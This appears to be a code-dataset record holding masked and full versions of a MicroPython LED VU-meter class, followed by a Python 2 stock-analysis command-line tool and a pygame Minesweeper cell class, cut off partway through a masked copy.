"step-2": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n <mask token>\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-3": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n\n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show(testData)\n self.ledChain.show([])\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-4": "import math as m\nimport utime\nfrom machine import ADC\nfrom ws2812 import WS2812\n\n\nclass vu_meter:\n ledsColors = []\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n\n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show(testData)\n self.ledChain.show([])\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-5": "#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]\n\n#Licensed under the Apache License, Version 2.0 (the \"License\");\n#you may not use this file except in compliance with the License.\n#You may obtain a copy of the License at\n\n#http://www.apache.org/licenses/LICENSE-2.0\n\n#Unless required by applicable law or agreed to in writing, software\n#distributed under the License is distributed on an \"AS IS\" BASIS,\n#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#See the License for the specific language governing permissions and\n#limitations under the License.\n\n#The above copyright notice and this permission notice shall be\n#included in all copies or substantial portions of the Software. \n\nimport math as m\nimport utime\n\nfrom machine import ADC\nfrom ws2812 import WS2812\n\nclass vu_meter: \n ledsColors = []\n \n def __init__(self, ledNumber=144, ledPower = 100, adcWindow = 1500, adcMax = 100, adcPin = 'P13', pinLEDs = 'P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber \n self.pinLeds = pinLEDs\n self.adcPin = adcPin \n self.adcWindow = adcWindow\n self.ledsColors = [] \n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False \n # inizialize ADC\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n \n def init_leds(self):\n self.ledsColors = [] \n for x in range(0, self.ledNumber):\n color = self.color_vu_meter (x)\n self.ledsColors.append(color)\n \n self.ledChain = WS2812( ledNumber=self.ledNumber, brightness=self.ledPower, dataPin=self.pinLeds ) # dataPin is for LoPy board only \n self.ledChain.show( self.ledsColors ) \n \n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show( testData ) \n self.ledChain.show([]) \n \n def lighter(self, color, percent):\n percent = percent / 100\n if(percent == 1):\n return color\n if(percent == 0):\n return ([0, 0, 0])\t\n #if(percent < 0.65):\t\t# driver not working ok with percent under 0.65 \n # percent = 0.65\n\n rcolor = color[0] - color[0] * (1-percent)\n gcolor = color[1] - color[1] * (1-percent)\n bcolor = color[2] - color[2] * (1-percent)\n newcolor = ([(rcolor), (gcolor), (bcolor)])\n return newcolor\t\t\n\n def color_vu_meter(self, position):\n rcolor = (255 * position) / self.ledNumber\n gcolor = (255 * (self.ledNumber - position)) / self.ledNumber \n bcolor= 0\n newcolor = self.lighter([(rcolor), (gcolor), (bcolor)], self.ledPower)\n return newcolor\n \n def adc_max_dynamic(self, state = True, adcMax = 100): \n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n \n def adc_max(self):\n return self.adcMax\n \n def zero_calibration(self):\n self.adcMean = 0 \n for y in range(0, self.adcWindow): \n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow \n return self.adcMean\n \n def update_rms(self):\n t1 = utime.ticks_ms() \n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow): \n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2) \n \n power = (m.sqrt(power / self.adcWindow))\n self.audioPower = power \n \n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1 \n \n if(self.adcMaxDynamic):\n if(self.adcMax < power):\n self.adcMax = power\n \n self.normalizedPower = power / self.adcMax\n #20 * log10(sqrt(sum / count))\n \n if(self.normalizedPower > 1):\n self.normalizedPower = 1 \n \n return [time_elapsed, power]\n \n def update_leds(self): \n leds_count = m.floor(self.normalizedPower * self.ledNumber) \n self.ledChain.show( self.ledsColors[1:leds_count] )\n",
"step-ids": [
7,
11,
12,
14,
15
]
}
|
[
7,
11,
12,
14,
15
] |
import stock as stk
import portfolio as portf
import plot
import sys
import cmd
import os
import decision as des
class CLI(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.prompt = '$> '
self.stk_data_coll = stk.StockDataCollection()
self.add_to_plot_lst = []
self.paralel_count = 10
def do_set_paralel_count(self, arg):
self.paralel_count = arg
def do_get_paralel_count(self, arg):
print self.paralel_count
def help_set_paralel_count(self):
print "syntax: set_paralel_count [NUMBER]",
print "-- update self.paralel_count for load command"
def do_load_collection(self, arg):
self.stk_data_coll.load(conf_file=arg, paralel_count=self.paralel_count)
print "---------------------------------------"
print "Data downloaded for ", arg
def help_load_collection(self):
print "syntax: load [portfolio file]",
print "-- load/updates the tickers from portfolio file"
def do_set_collection(self, arg):
self.stk_data_coll.set_colection(arg)
def help_set_collection(self):
print "syntax: set_collection [portfolio file]",
print "-- set the tickers from portfolio file"
def do_get_collection(self, arg):
print "-----------------------------"
print " Collection from ", self.stk_data_coll.conf_file
print "-----------------------------"
for c in self.stk_data_coll.stk_data_coll:
print c
def do_cleanup(self, arg):
filelist = [ f for f in os.listdir("./data") if f.endswith(".dat") ]
for f in filelist:
os.remove("./data/" + f)
def help_cleanup(self):
print "syntax: cleanup",
print "-- removes all data files"
def do_plot_indexes(self, arg):
indexes = arg.split(',',1)
a_plot = plot.Plot(plot.PlotCellIndex(indexes[0]))
try:
for index in indexes[1:]:
p = plot.PlotCellIndex(index)
a_plot.addSimple(plot.PlotCell((p.data,p.dates)))
finally: a_plot.plot()
def help_plot_indexes(self):
print "syntax: plot_index [index_name1,index_name2,....]",
print "-- plot slimple index from csv"
def do_plot_ticker_indexes(self,arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, indexes, startdate = arg.split()
indexes = indexes.split(',',1)
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
for index in indexes:
p = plot.PlotCellIndex(index)
p.truncate(startdate)
a_plot.addSimple(plot.PlotCell((p.data,p.dates)))
a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),20)))
a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),50),overlay=True))
a_plot.plot()
def do_plot_collection(self, arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, startdate = arg.split()
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))
a_plot.addSimple(plot.PlotCell( calc.obv((sd.Cs,sd.Vs,sd.dates) )))
a_plot.addSimple(plot.PlotCell( calc.correlation_adj((sd.Cs,sd.dates))))
a_plot.plot()
def do_plot(self, arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, startdate = arg.split()
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))
arr_obv = calc.obv((sd.Cs,sd.Vs,sd.dates) )
a_plot.addSimple(plot.PlotCell( arr_obv))
a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 20),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 60),overlay=True))
a_plot.plot()
def help_plot(self):
print "syntax: plot [ticker] []|[start date YYYYMMDD]",
print "-- plots the ticker"
def do_simulation(self, arg):
ticker, startdate = arg.split()
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
sd.load(ticker, startdate)
port = des.DecisionCollection(ticker, 50000)
decision = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port)
decision.looper()
print ticker, ":", str(port)
port2 = des.DecisionCollection(ticker, 50000)
decision2 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port2, risk_factor=0.01, )
decision2.looper()
print ticker, ":", str(port2)
port2.print_all()
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( port2.get_enter_plot_cell(), overlay=True, color='go' ))
a_plot.addSimple(plot.PlotCell( port2.get_leave_plot_cell(), overlay=True, color='ro' ))
a_plot.addSimple(plot.PlotCell( port2.get_value_plot_cell()))
a_plot.plot()
def help_simulation(self):
print "syntax: simulation [ticker] []|[start date YYYYMMDD]",
print "-- runs a simulation on a single ticker"
def do_simulation_collection(self, arg ):
for ticker in self.stk_data_coll.stk_data_coll:
sd = stk.StockData()
sd.load(ticker, arg)
port = des.DecisionCollection(ticker, 50000)
decision = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port, risk_factor=0.02, sma_fast=10, sma_slow=50, stop_per=5)
decision.looper()
port4 = des.DecisionCollection(ticker, 50000)
decision4 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port4, sma_fast=10, sma_slow=50, stop_per=5)
decision4.looper()
port2 = des.DecisionCollection(ticker, 50000)
decision2 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port2)
decision2.looper()
port3 = des.DecisionCollection(ticker, 50000)
decision3 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port3, risk_factor=0.02, sma_fast=50, sma_slow=200, stop_per=40)
decision3.looper()
print "STOP_FAST - ", ticker, " ", str(port)
print "SIMPLE_FAST - ", ticker, " ", str(port4)
print "STOP_SLOW - ", ticker, " ", str(port3)
print "SIMPLE_SLOW - ", ticker, " ", str(port2)
def emptyline(self):
pass
def do_quit(self, arg):
sys.exit(1)
if __name__ == "__main__":
cli = CLI()
cli.cmdloop()
|
normal
|
{
"blob_id": "d386047c087155b1809d47349339eb6882cf8e26",
"index": 5013,
"step-1": "import stock as stk\nimport portfolio as portf\nimport plot\nimport sys\nimport cmd\nimport os\nimport decision as des\n \n \nclass CLI(cmd.Cmd):\n\n def __init__(self):\n cmd.Cmd.__init__(self)\n self.prompt = '$> '\n self.stk_data_coll = stk.StockDataCollection()\n self.add_to_plot_lst = []\n self.paralel_count = 10\n \n def do_set_paralel_count(self, arg):\n self.paralel_count = arg\n \n def do_get_paralel_count(self, arg):\n print self.paralel_count\n \n def help_set_paralel_count(self):\n print \"syntax: set_paralel_count [NUMBER]\",\n print \"-- update self.paralel_count for load command\"\n \n \n def do_load_collection(self, arg):\n self.stk_data_coll.load(conf_file=arg, paralel_count=self.paralel_count)\n print \"---------------------------------------\"\n print \"Data downloaded for \", arg \n \n def help_load_collection(self):\n print \"syntax: load [portfolio file]\",\n print \"-- load/updates the tickers from portfolio file\"\n\n def do_set_collection(self, arg):\n self.stk_data_coll.set_colection(arg)\n \n def help_set_collection(self):\n print \"syntax: set_collection [portfolio file]\",\n print \"-- set the tickers from portfolio file\"\n\n \n def do_get_collection(self, arg):\n print \"-----------------------------\"\n print \" Collection from \", self.stk_data_coll.conf_file\n print \"-----------------------------\"\n for c in self.stk_data_coll.stk_data_coll:\n print c\n \n \n def do_cleanup(self, arg):\n filelist = [ f for f in os.listdir(\"./data\") if f.endswith(\".dat\") ]\n for f in filelist:\n os.remove(\"./data/\" + f)\n \n def help_cleanup(self):\n print \"syntax: cleanup\",\n print \"-- removes all data files\"\n \n\n def do_plot_indexes(self, arg): \n indexes = arg.split(',',1)\n a_plot = plot.Plot(plot.PlotCellIndex(indexes[0]))\n try:\n for index in indexes[1:]:\n p = plot.PlotCellIndex(index)\n a_plot.addSimple(plot.PlotCell((p.data,p.dates)))\n finally: a_plot.plot()\n \n def help_plot_indexes(self):\n print \"syntax: plot_index [index_name1,index_name2,....]\",\n print \"-- plot slimple index from csv\"\n \n def do_plot_ticker_indexes(self,arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, indexes, startdate = arg.split()\n indexes = indexes.split(',',1)\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n \n for index in indexes:\n p = plot.PlotCellIndex(index)\n p.truncate(startdate)\n a_plot.addSimple(plot.PlotCell((p.data,p.dates))) \n a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),20)))\n a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),50),overlay=True))\n \n a_plot.plot()\n \n def do_plot_collection(self, arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, startdate = arg.split()\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))\n a_plot.addSimple(plot.PlotCell( calc.obv((sd.Cs,sd.Vs,sd.dates) )))\n \n a_plot.addSimple(plot.PlotCell( calc.correlation_adj((sd.Cs,sd.dates))))\n \n a_plot.plot()\n\n\n def do_plot(self, arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, startdate = arg.split()\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))\n \n arr_obv = calc.obv((sd.Cs,sd.Vs,sd.dates) )\n a_plot.addSimple(plot.PlotCell( arr_obv)) \n \n a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 20),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 60),overlay=True))\n \n \n a_plot.plot()\n\n \n def help_plot(self):\n print \"syntax: plot [ticker] []|[start date YYYYMMDD]\",\n print \"-- plots the ticker\"\n \n \n def do_simulation(self, arg):\n ticker, startdate = arg.split()\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n sd.load(ticker, startdate)\n\n port = des.DecisionCollection(ticker, 50000)\n decision = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port)\n decision.looper()\n print ticker, \":\", str(port)\n \n port2 = des.DecisionCollection(ticker, 50000)\n decision2 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port2, risk_factor=0.01, )\n decision2.looper()\n print ticker, \":\", str(port2)\n port2.print_all()\n \n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( port2.get_enter_plot_cell(), overlay=True, color='go' ))\n a_plot.addSimple(plot.PlotCell( port2.get_leave_plot_cell(), overlay=True, color='ro' ))\n \n a_plot.addSimple(plot.PlotCell( port2.get_value_plot_cell()))\n a_plot.plot()\n \n def help_simulation(self):\n print \"syntax: simulation [ticker] []|[start date YYYYMMDD]\",\n print \"-- runs a simulation on a single ticker\"\n \n \n def do_simulation_collection(self, arg ):\n for ticker in self.stk_data_coll.stk_data_coll:\n sd = stk.StockData()\n sd.load(ticker, arg)\n\n port = des.DecisionCollection(ticker, 50000)\n decision = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port, risk_factor=0.02, sma_fast=10, sma_slow=50, stop_per=5)\n decision.looper()\n \n port4 = des.DecisionCollection(ticker, 50000)\n decision4 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port4, sma_fast=10, sma_slow=50, stop_per=5)\n decision4.looper() \n \n port2 = des.DecisionCollection(ticker, 50000)\n decision2 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port2)\n decision2.looper()\n \n port3 = des.DecisionCollection(ticker, 50000)\n decision3 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port3, risk_factor=0.02, sma_fast=50, sma_slow=200, stop_per=40)\n decision3.looper() \n \n print \"STOP_FAST - \", ticker, \" \", str(port)\n print \"SIMPLE_FAST - \", ticker, \" \", str(port4)\n print \"STOP_SLOW - \", ticker, \" \", str(port3)\n print \"SIMPLE_SLOW - \", ticker, \" \", str(port2)\n \n \n \n def emptyline(self):\n pass\n \n def do_quit(self, arg):\n sys.exit(1)\n \nif __name__ == \"__main__\": \n \n cli = CLI()\n cli.cmdloop()\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pygame
from settings import *
import random
class Cell:
def __init__(self, game, x, y, bombs):
self.game = game
self.x = x
self.y = y
self.i = x // TILESIZE
self.j = y // TILESIZE
self.revelada = False
self.bomba = False
self.bombas_total = bombs
self.bombs_around = 0
self.flag_enabled = False
def reveal(self):
if not self.game.is_game_over:
self.revelada = True
if self.bombs_around == 0:
self.flood()
if self.bomba:
self.game.is_game_over = True
self.game.score = 0
EFFECT.play()
def check_neighbours(self, grid):
"""
This function will count how many bombs there is around a particular cell
"""
if self.bomba:
self.bombs_around = -1
return
total = 0
for x in range(-1, 2):
for y in range(-1, 2):
i = self.i + x
j = self.j + y
if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):
neighbor = grid[i][j]
if neighbor.bomba:
total += 1
self.bombs_around = total
def flood(self):
for x in range(-1, 2):
for y in range(-1, 2):
i = self.i + x
j = self.j + y
if i > -1 and i < len(self.game.grid) and j > -1 and j < len(self.game.grid[1]):
neighbor = self.game.grid[i][j]
if not neighbor.revelada and not neighbor.flag_enabled and not self.game.is_game_over:
neighbor.reveal()
def enable_flag(self):
self.flag_enabled = not self.flag_enabled
if self.bomba: # TODO: and self.flag_enabled
self.game.score += 1
# TODO: else: self.game.score -= 1
# all the spots revealed shouldn't be a bomb
def draw_number(self):
"""
This function will draw the numbers according to the total of bombs around the cell.
Also it will give colors to some numbers
"""
text_color = (0, 0, 0)
if self.bombs_around == 1:
text_color = (0, 0, 150)
if self.bombs_around == 2:
text_color = (0, 150, 0)
if self.bombs_around == 3:
text_color = (150, 0, 0)
if self.bombs_around == 4:
text_color = (133, 39, 138)
if self.bombs_around == 5:
text_color = (128, 0, 0)
if self.bombs_around == 6:
text_color = (175, 238, 238)
if self.bombs_around == 7:
text_color = (0, 0, 0)
if self.bombs_around == 8:
text_color = (33, 161, 166)
font = pygame.font.Font("fonts/JetBrainsMono-Bold.ttf", 24)
if self.bombs_around > 0 and self.revelada:
text = font.render(
str(self.bombs_around), False, text_color)
self.game.screen.blit(text, (self.x + 12, self.y))
def set_bomb(self):
"""
This function will turn this cell into a cell with a bomb
(just to keep organized)
"""
self.bomba = True
def draw_cell(self):
pygame.draw.rect(
self.game.screen, WHITE, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))
if self.revelada:
if self.bomba:
pygame.draw.rect(
self.game.screen, RED, (self.x + 10, self.y + 10, TILESIZE - 23, TILESIZE - 23))
else:
pygame.draw.rect(
self.game.screen, GRAY, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))
if self.flag_enabled and not self.revelada:
self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)
def get_mouse_pos(self):
mouse = pygame.mouse.get_pos()
return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]
|
normal
|
{
"blob_id": "e31f1e24c319f338d728661dfd50e758526112d6",
"index": 7796,
"step-1": "<mask token>\n\n\nclass Cell:\n <mask token>\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n <mask token>\n <mask token>\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 